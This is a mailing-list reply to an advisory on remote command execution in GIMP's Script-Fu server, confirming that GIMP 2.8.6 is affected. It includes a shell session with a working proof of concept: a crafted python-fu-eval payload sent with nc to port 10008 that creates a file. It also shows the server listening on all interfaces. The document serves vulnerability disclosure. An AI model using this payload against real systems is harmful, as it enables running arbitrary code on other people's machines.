Re: GIMP Scriptfu Python Remote Command Execution

[Sebastian Pipping <sebastian () pipping org>]

On 16.08.2012 23:00, research wrote:
> Affected Products
> =================
>
> GIMP 2.6 branch (Windows or Linux builds)
>
> Non-Affected Products
> =====================
>
> The Scriptfu network server component does not currently work in the GIMP
> 2.8 branch 
> (Windows or Linux builds). 

I was able to verify that vulnerability with Gimp 2.8.6 on my local
machine so at least some versions of the Gimp 2.8.x series seem affected
to me.  This is my shell session:


$ rm /tmp/owned

$ p='(python-fu-eval 0 "open('"'"'/tmp/owned'"'"', '"'"'w'"'"')")';
printf "G\x0\x2c%s" "${p}" | nc -w 1 localhost 10008 | od -c
0000000   G  \0  \0  \a   S   u   c   c   e   s   s
0000013

$ ls -al /tmp/owned
-rw-r--r-- 1 user user 0 Sep 15 02:56 /tmp/owned


The server started from the GUI seems to be listening anywhere:


$ netstat -tulpen 2>/dev/null | fgrep script-fu
tcp  0  0 0.0.0.0:10008  0.0.0.0:*  LISTEN  1000  102934  6392/script-fu


Best,



Sebastian